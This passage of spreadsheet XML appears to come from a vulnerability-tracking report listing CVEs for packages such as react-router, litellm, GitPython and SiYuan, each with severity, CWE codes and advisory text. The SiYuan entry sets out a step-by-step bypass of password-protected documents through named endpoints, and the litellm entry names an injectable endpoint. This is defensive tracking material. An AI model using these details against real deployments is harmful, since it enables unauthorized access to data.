used to generate the tag.

&gt; [!NOTE]
&gt; This does not impact applications using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S2353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-59057</t></is></c></row><row r="2354"><c r="A2354" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2354" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2354" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D2354" s="5" t="inlineStr" /><c r="E2354" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2354" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2354" s="5" t="inlineStr" /><c r="H2354" s="5" t="n"><v>0.001</v></c><c r="I2354" s="5" t="inlineStr" /><c r="J2354" s="5" t="inlineStr" /><c r="K2354" s="5" t="inlineStr" /><c r="L2354" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M2354" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N2354" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2354" s="5" t="inlineStr" /><c r="P2354" s="5" t="inlineStr" /><c r="Q2354" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="R2354"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S2354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="2355"><c r="A2355" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2355" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2355" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D2355" s="5" t="inlineStr" /><c r="E2355" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2355" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2355" s="5" t="inlineStr" /><c r="H2355" s="5" t="n"><v>0.002</v></c><c r="I2355" s="5" t="inlineStr" /><c r="J2355" s="5" t="inlineStr" /><c r="K2355" s="5" t="inlineStr" /><c r="L2355" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M2355" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N2355" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2355" s="5" t="inlineStr" /><c r="P2355" s="5" t="inlineStr" /><c r="Q2355" s="5" t="inlineStr"><is><t>CWE-117</t></is></c><c r="R2355"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S2355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="2356"><c r="A2356" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2356" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2356" s="5" t="inlineStr"><is><t>CVE-2026-19693</t></is></c><c r="D2356" s="5" t="inlineStr" /><c r="E2356" s="5" t="inlineStr" /><c r="F2356" s="5" t="inlineStr" /><c r="G2356" s="5" t="inlineStr" /><c r="H2356" s="5" t="n"><v>0.003</v></c><c r="I2356" s="5" t="inlineStr" /><c r="J2356" s="5" t="inlineStr" /><c r="K2356" s="5" t="inlineStr" /><c r="L2356" s="5" t="inlineStr"><is><t>npm:extract-zip</t></is></c><c r="M2356" s="5" t="inlineStr" /><c r="N2356" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2356" s="5" t="inlineStr" /><c r="P2356" s="5" t="inlineStr" /><c r="Q2356" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2356" s="5" t="inlineStr"><is><t>extract-zip through 2.0.1 containment-checks only the parent directory of each archive entry and never the entry's own final path component, so an archive containing two entries with identical names - a symlink whose target is outside the destination, followed by a regular file - writes through the planted symlink and yields an arbitrary file write outside the destination directory.</t></is></c><c r="S2356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19693</t></is></c></row><row r="2357"><c r="A2357" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2357" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2357" s="5" t="inlineStr"><is><t>CVE-2026-21884</t></is></c><c r="D2357" s="5" t="inlineStr" /><c r="E2357" s="5" t="inlineStr" /><c r="F2357" s="5" t="inlineStr" /><c r="G2357" s="5" t="inlineStr" /><c r="H2357" s="5" t="n"><v>0.005</v></c><c r="I2357" s="5" t="inlineStr" /><c r="J2357" s="5" t="inlineStr" /><c r="K2357" s="5" t="inlineStr" /><c r="L2357" s="5" t="inlineStr"><is><t>npm:@remix-run/react, npm:react-router</t></is></c><c r="M2357" s="5" t="inlineStr"><is><t>2.17.3, 7.12.0</t></is></c><c r="N2357" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2357" s="5" t="inlineStr" /><c r="P2357" s="5" t="inlineStr" /><c r="Q2357" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2357" s="5" t="inlineStr"><is><t>A XSS vulnerability exists in in React Router's `&lt;ScrollRestoration&gt;` API in [Framework Mode](https://reactrouter.com/start/modes#framework) when using the `getKey`/`storageKey` props during Server-Side Rendering which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the keys.

&gt; [!NOTE]
&gt; This does not impact applications if developers have [disabled server-side rendering](https://reactrouter.com/how-to/spa) in Framework Mode, or if they are using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S2357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-21884</t></is></c></row><row r="2358"><c r="A2358" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2358" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2358" s="5" t="inlineStr"><is><t>CVE-2026-33244</t></is></c><c r="D2358" s="5" t="inlineStr" /><c r="E2358" s="5" t="inlineStr" /><c r="F2358" s="5" t="inlineStr" /><c r="G2358" s="5" t="inlineStr" /><c r="H2358" s="5" t="n"><v>0.001</v></c><c r="I2358" s="5" t="inlineStr" /><c r="J2358" s="5" t="inlineStr" /><c r="K2358" s="5" t="inlineStr" /><c r="L2358" s="5" t="inlineStr"><is><t>npm:react-router</t></is></c><c r="M2358" s="5" t="inlineStr"><is><t>7.13.2</t></is></c><c r="N2358" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2358" s="5" t="inlineStr" /><c r="P2358" s="5" t="inlineStr" /><c r="Q2358" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2358" s="5" t="inlineStr"><is><t>When using React Router v7 [Framework Mode](https://reactrouter.com/start/modes#framework) with [Pre-rendering](https://reactrouter.com/how-to/pre-rendering) enabled, an improper neutralization of the HTTP `Location` header value can permit Cross-Site Scripting (XSS) in statically generated HTML files if the redirect location comes from an untrusted source.

&gt; [!NOTE]
&gt; This does not impact your React Router application if you are using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S2358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33244</t></is></c></row><row r="2359"><c r="A2359" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2359" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2359" s="5" t="inlineStr"><is><t>CVE-2026-37004</t></is></c><c r="D2359" s="5" t="inlineStr" /><c r="E2359" s="5" t="inlineStr" /><c r="F2359" s="5" t="inlineStr" /><c r="G2359" s="5" t="inlineStr" /><c r="H2359" s="5" t="n"><v>0.005</v></c><c r="I2359" s="5" t="inlineStr" /><c r="J2359" s="5" t="inlineStr" /><c r="K2359" s="5" t="inlineStr" /><c r="L2359" s="5" t="inlineStr"><is><t>pip:litellm</t></is></c><c r="M2359" s="5" t="inlineStr"><is><t>1.83.7</t></is></c><c r="N2359" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2359" s="5" t="inlineStr" /><c r="P2359" s="5" t="inlineStr" /><c r="Q2359" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R2359" s="5" t="inlineStr"><is><t>BerriAI litellm &lt;=1.82.4 is vulnerable to Server-Side Template Injection (SSTI), which allows unauthenticated remote attackers to execute arbitrary OS commands via a crafted dotprompt_content parameter in the /prompts/test endpoint due to use of an unsandboxed jinja2.Environment.</t></is></c><c r="S2359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-37004</t></is></c></row><row r="2360"><c r="A2360" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2360" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2360" s="5" t="inlineStr"><is><t>CVE-2026-41855</t></is></c><c r="D2360" s="5" t="inlineStr" /><c r="E2360" s="5" t="inlineStr" /><c r="F2360" s="5" t="inlineStr" /><c r="G2360" s="5" t="inlineStr" /><c r="H2360" s="5" t="n"><v>0.003</v></c><c r="I2360" s="5" t="inlineStr" /><c r="J2360" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K2360" s="5" t="inlineStr" /><c r="L2360" s="5" t="inlineStr"><is><t>maven:org.springframework:spring-jms</t></is></c><c r="M2360" s="5" t="inlineStr"><is><t>6.2.19, 7.0.8</t></is></c><c r="N2360" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2360" s="5" t="inlineStr" /><c r="P2360" s="5" t="inlineStr" /><c r="Q2360" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R2360" s="5" t="inlineStr"><is><t>In an untrusted JMS environment, org.springframework.jms.support.converter.MappingJackson2MessageConverter and org.springframework.jms.support.converter.JacksonJsonMessageConverter allow arbitrary class instantiation, which can lead to unauthorized actions via gadget class deserialization.

Affected versions:
Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48.</t></is></c><c r="S2360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-41855</t></is></c></row><row r="2361"><c r="A2361" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2361" s="5" t="inlineStr"><is><t>CVE-2026-45219</t></is></c><c r="D2361" s="5" t="inlineStr" /><c r="E2361" s="5" t="inlineStr" /><c r="F2361" s="5" t="inlineStr" /><c r="G2361" s="5" t="inlineStr" /><c r="H2361" s="5" t="inlineStr" /><c r="I2361" s="5" t="inlineStr" /><c r="J2361" s="5" t="inlineStr" /><c r="K2361" s="5" t="inlineStr" /><c r="L2361" s="5" t="inlineStr" /><c r="M2361" s="5" t="inlineStr" /><c r="N2361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2361" s="5" t="inlineStr" /><c r="Q2361" s="5" t="inlineStr" /><c r="R2361" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t></is></c></row><row r="2362"><c r="A2362" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2362" s="5" t="inlineStr"><is><t>CVE-2026-45220</t></is></c><c r="D2362" s="5" t="inlineStr" /><c r="E2362" s="5" t="inlineStr" /><c r="F2362" s="5" t="inlineStr" /><c r="G2362" s="5" t="inlineStr" /><c r="H2362" s="5" t="inlineStr" /><c r="I2362" s="5" t="inlineStr" /><c r="J2362" s="5" t="inlineStr" /><c r="K2362" s="5" t="inlineStr" /><c r="L2362" s="5" t="inlineStr" /><c r="M2362" s="5" t="inlineStr" /><c r="N2362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2362" s="5" t="inlineStr" /><c r="Q2362" s="5" t="inlineStr" /><c r="R2362" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t></is></c></row><row r="2363"><c r="A2363" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2363" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2363" s="5" t="inlineStr"><is><t>CVE-2026-49114</t></is></c><c r="D2363" s="5" t="inlineStr" /><c r="E2363" s="5" t="inlineStr" /><c r="F2363" s="5" t="inlineStr" /><c r="G2363" s="5" t="inlineStr" /><c r="H2363" s="5" t="n"><v>0.001</v></c><c r="I2363" s="5" t="inlineStr" /><c r="J2363" s="5" t="inlineStr" /><c r="K2363" s="5" t="inlineStr" /><c r="L2363" s="5" t="inlineStr"><is><t>pip:onnx</t></is></c><c r="M2363" s="5" t="inlineStr"><is><t>1.21.0</t></is></c><c r="N2363" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2363" s="5" t="inlineStr" /><c r="P2363" s="5" t="inlineStr" /><c r="Q2363" s="5" t="inlineStr"><is><t>CWE-22, CWE-59, CWE-367</t></is></c><c r="R2363" s="5" t="inlineStr"><is><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is></c><c r="S2363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49114</t></is></c></row><row r="2364"><c r="A2364" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2364" s="5" t="inlineStr"><is><t>CVE-2026-49153</t></is></c><c r="D2364" s="5" t="inlineStr" /><c r="E2364" s="5" t="inlineStr" /><c r="F2364" s="5" t="inlineStr" /><c r="G2364" s="5" t="inlineStr" /><c r="H2364" s="5" t="inlineStr" /><c r="I2364" s="5" t="inlineStr" /><c r="J2364" s="5" t="inlineStr" /><c r="K2364" s="5" t="inlineStr" /><c r="L2364" s="5" t="inlineStr" /><c r="M2364" s="5" t="inlineStr" /><c r="N2364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2364" s="5" t="inlineStr" /><c r="Q2364" s="5" t="inlineStr" /><c r="R2364" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t></is></c></row><row r="2365"><c r="A2365" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2365" s="5" t="inlineStr"><is><t>CVE-2026-49154</t></is></c><c r="D2365" s="5" t="inlineStr" /><c r="E2365" s="5" t="inlineStr" /><c r="F2365" s="5" t="inlineStr" /><c r="G2365" s="5" t="inlineStr" /><c r="H2365" s="5" t="inlineStr" /><c r="I2365" s="5" t="inlineStr" /><c r="J2365" s="5" t="inlineStr" /><c r="K2365" s="5" t="inlineStr" /><c r="L2365" s="5" t="inlineStr" /><c r="M2365" s="5" t="inlineStr" /><c r="N2365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2365" s="5" t="inlineStr" /><c r="Q2365" s="5" t="inlineStr" /><c r="R2365" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t></is></c></row><row r="2366"><c r="A2366" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2366" s="5" t="inlineStr"><is><t>CVE-2026-49155</t></is></c><c r="D2366" s="5" t="inlineStr" /><c r="E2366" s="5" t="inlineStr" /><c r="F2366" s="5" t="inlineStr" /><c r="G2366" s="5" t="inlineStr" /><c r="H2366" s="5" t="inlineStr" /><c r="I2366" s="5" t="inlineStr" /><c r="J2366" s="5" t="inlineStr" /><c r="K2366" s="5" t="inlineStr" /><c r="L2366" s="5" t="inlineStr" /><c r="M2366" s="5" t="inlineStr" /><c r="N2366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2366" s="5" t="inlineStr" /><c r="Q2366" s="5" t="inlineStr" /><c r="R2366" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t></is></c></row><row r="2367"><c r="A2367" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2367" s="5" t="inlineStr"><is><t>CVE-2026-49156</t></is></c><c r="D2367" s="5" t="inlineStr" /><c r="E2367" s="5" t="inlineStr" /><c r="F2367" s="5" t="inlineStr" /><c r="G2367" s="5" t="inlineStr" /><c r="H2367" s="5" t="inlineStr" /><c r="I2367" s="5" t="inlineStr" /><c r="J2367" s="5" t="inlineStr" /><c r="K2367" s="5" t="inlineStr" /><c r="L2367" s="5" t="inlineStr" /><c r="M2367" s="5" t="inlineStr" /><c r="N2367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2367" s="5" t="inlineStr" /><c r="Q2367" s="5" t="inlineStr" /><c r="R2367" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t></is></c></row><row r="2368"><c r="A2368" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2368" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2368" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D2368" s="5" t="inlineStr" /><c r="E2368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2368" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2368" s="5" t="inlineStr" /><c r="H2368" s="5" t="n"><v>0.01</v></c><c r="I2368" s="5" t="inlineStr" /><c r="J2368" s="5" t="inlineStr" /><c r="K2368" s="5" t="inlineStr" /><c r="L2368" s="5" t="inlineStr"><is><t>nuget:Microsoft.WindowsDesktop.App.Runtime.win-arm64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M2368" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N2368" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2368" s="5" t="inlineStr" /><c r="P2368" s="5" t="inlineStr" /><c r="Q2368" s="5" t="inlineStr"><is><t>CWE-502, CWE-693</t></is></c><c r="R2368"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S2368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="2369"><c r="A2369" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2369" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2369" s="5" t="inlineStr"><is><t>CVE-2026-53668</t></is></c><c r="D2369" s="5" t="inlineStr" /><c r="E2369" s="5" t="inlineStr" /><c r="F2369" s="5" t="inlineStr" /><c r="G2369" s="5" t="inlineStr" /><c r="H2369" s="5" t="n"><v>0.003</v></c><c r="I2369" s="5" t="inlineStr" /><c r="J2369" s="5" t="inlineStr" /><c r="K2369" s="5" t="inlineStr" /><c r="L2369" s="5" t="inlineStr"><is><t>npm:react-router, npm:react-router-dom</t></is></c><c r="M2369" s="5" t="inlineStr"><is><t>6.30.6, 7.13.0</t></is></c><c r="N2369" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2369" s="5" t="inlineStr" /><c r="P2369" s="5" t="inlineStr" /><c r="Q2369" s="5" t="inlineStr"><is><t>CWE-79, CWE-601</t></is></c><c r="R2369" s="5" t="inlineStr"><is><t>Applications with open redirects could permit attacker crafted links to result in redirects to unexpected external location or XSS vectors.</t></is></c><c r="S2369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53668</t></is></c></row><row r="2370"><c r="A2370" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2370" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2370" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D2370" s="5" t="inlineStr" /><c r="E2370" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2370" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2370" s="5" t="inlineStr" /><c r="H2370" s="5" t="n"><v>0.005</v></c><c r="I2370" s="5" t="inlineStr" /><c r="J2370" s="5" t="inlineStr" /><c r="K2370" s="5" t="inlineStr" /><c r="L2370" s="5" t="inlineStr"><is><t>nuget:Microsoft.Build.Tasks.Git, nuget:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M2370" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N2370" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2370" s="5" t="inlineStr" /><c r="P2370" s="5" t="inlineStr" /><c r="Q2370" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="R2370"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S2370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="2371"><c r="A2371" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2371" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2371" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D2371" s="5" t="inlineStr" /><c r="E2371" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2371" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2371" s="5" t="inlineStr" /><c r="H2371" s="5" t="n"><v>0.004</v></c><c r="I2371" s="5" t="inlineStr" /><c r="J2371" s="5" t="inlineStr" /><c r="K2371" s="5" t="inlineStr" /><c r="L2371" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M2371" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N2371" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2371" s="5" t="inlineStr" /><c r="P2371" s="5" t="inlineStr" /><c r="Q2371" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R2371"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S2371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="2372"><c r="A2372" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2372" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2372" s="5" t="inlineStr"><is><t>CVE-2026-67322</t></is></c><c r="D2372" s="5" t="inlineStr" /><c r="E2372" s="5" t="inlineStr" /><c r="F2372" s="5" t="inlineStr" /><c r="G2372" s="5" t="inlineStr" /><c r="H2372" s="5" t="n"><v>0.003</v></c><c r="I2372" s="5" t="inlineStr" /><c r="J2372" s="5" t="inlineStr" /><c r="K2372" s="5" t="inlineStr" /><c r="L2372" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M2372" s="5" t="inlineStr"><is><t>3.1.52</t></is></c><c r="N2372" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2372" s="5" t="inlineStr" /><c r="P2372" s="5" t="inlineStr" /><c r="Q2372" s="5" t="inlineStr"><is><t>CWE-200, CWE-201</t></is></c><c r="R2372" s="5" t="inlineStr"><is><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is></c><c r="S2372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67322</t></is></c></row><row r="2373"><c r="A2373" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2373" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2373" s="5" t="inlineStr"><is><t>CVE-2026-67323</t></is></c><c r="D2373" s="5" t="inlineStr" /><c r="E2373" s="5" t="inlineStr" /><c r="F2373" s="5" t="inlineStr" /><c r="G2373" s="5" t="inlineStr" /><c r="H2373" s="5" t="n"><v>0.01</v></c><c r="I2373" s="5" t="inlineStr" /><c r="J2373" s="5" t="inlineStr" /><c r="K2373" s="5" t="inlineStr" /><c r="L2373" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2373" s="5" t="inlineStr"><is><t>3.1.51</t></is></c><c r="N2373" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2373" s="5" t="inlineStr" /><c r="P2373" s="5" t="inlineStr" /><c r="Q2373" s="5" t="inlineStr"><is><t>CWE-77, CWE-88</t></is></c><c r="R2373" s="5" t="inlineStr"><is><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is></c><c r="S2373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67323</t></is></c></row><row r="2374"><c r="A2374" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2374" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2374" s="5" t="inlineStr"><is><t>CVE-2026-67325</t></is></c><c r="D2374" s="5" t="inlineStr" /><c r="E2374" s="5" t="inlineStr" /><c r="F2374" s="5" t="inlineStr" /><c r="G2374" s="5" t="inlineStr" /><c r="H2374" s="5" t="n"><v>0.019</v></c><c r="I2374" s="5" t="inlineStr" /><c r="J2374" s="5" t="inlineStr" /><c r="K2374" s="5" t="inlineStr" /><c r="L2374" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2374" s="5" t="inlineStr"><is><t>3.1.51</t></is></c><c r="N2374" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2374" s="5" t="inlineStr" /><c r="P2374" s="5" t="inlineStr" /><c r="Q2374" s="5" t="inlineStr"><is><t>CWE-78, CWE-184</t></is></c><c r="R2374" s="5" t="inlineStr"><is><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is></c><c r="S2374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67325</t></is></c></row><row r="2375"><c r="A2375" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2375" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2375" s="5" t="inlineStr"><is><t>CVE-2026-68584</t></is></c><c r="D2375" s="5" t="inlineStr" /><c r="E2375" s="5" t="inlineStr" /><c r="F2375" s="5" t="inlineStr" /><c r="G2375" s="5" t="inlineStr" /><c r="H2375" s="5" t="n"><v>0.003</v></c><c r="I2375" s="5" t="inlineStr" /><c r="J2375" s="5" t="inlineStr" /><c r="K2375" s="5" t="inlineStr" /><c r="L2375" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M2375" s="5" t="inlineStr"><is><t>0.0.0-20260721020826-2d069dce84a2</t></is></c><c r="N2375" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2375" s="5" t="inlineStr" /><c r="P2375" s="5" t="inlineStr" /><c r="Q2375" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R2375" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-68584](https://nvd.nist.gov/vuln/detail/CVE-2026-68584).

### Summary

SiYuan's publish mode defines a "protected" access level: a document that is publicly listed but requires a password to read (per the product's own UI help text, protected = "Publicly visible, requires password to access"). The password is enforced on the primary content path (`getDoc`, via `FilterContentByPublishAccess`).

Several other content-returning endpoints `getHeadingChildrenDOM`, `getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/ `getHeadingInsertTransaction`, and `getBacklinkDoc`/`getBackmentionDoc` return rendered block DOM with **no password check at all**. Combined with reader-reachable endpoints that leak a protected document's internal block IDs, an anonymous reader can retrieve the full body of a password-protected document without the password. This has been reproduced end-to-end on a live instance.

### Details

**The password control and where it is enforced.** Publish access has five levels encoded in `visible`/`password`/`disable`: public, protected (password), hidden, private (password), forbidden. `getDoc` correctly enforces the password for protected/private documents via `FilterContentByPublishAccess`. The bug is that other content endpoints do not.

**Content endpoints with no password check (all `CheckAuth`-only):**
- `getHeadingChildrenDOM` returns rendered DOM of a heading subtree.
- `getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/`getHeadingInsertTransaction` return rendered heading DOM in the computed transaction payload (no mutation occurs on this path).
- `getBacklinkDoc`/`getBackmentionDoc` return rendered DOM of referencing blocks.

None of these invokes the publish-password check that `getDoc` applies. Each converts a block ID into full rendered content regardless of the containing document's protected/password status.

**The ID-leak that removes the precondition.** A protected document is, by design, publicly listed (`listDocsByPath` filters on `visible`, and protected documents are visible), so an anonymous reader obtains the document's root ID. The document's internal block/heading IDs are then obtainable from reader-reachable endpoints notably the `searchEmbedBlock` endpoint (reported separately), whose post-query filter `FilterEmbedBlocksByPublishAccess` **replaces the content string but retains the block ID**. So the "filtered" search still yields the protected document's internal heading IDs. (Other reader-reachable endpoints also leak block IDs, the vulnerability does not depend on any single ID source.)

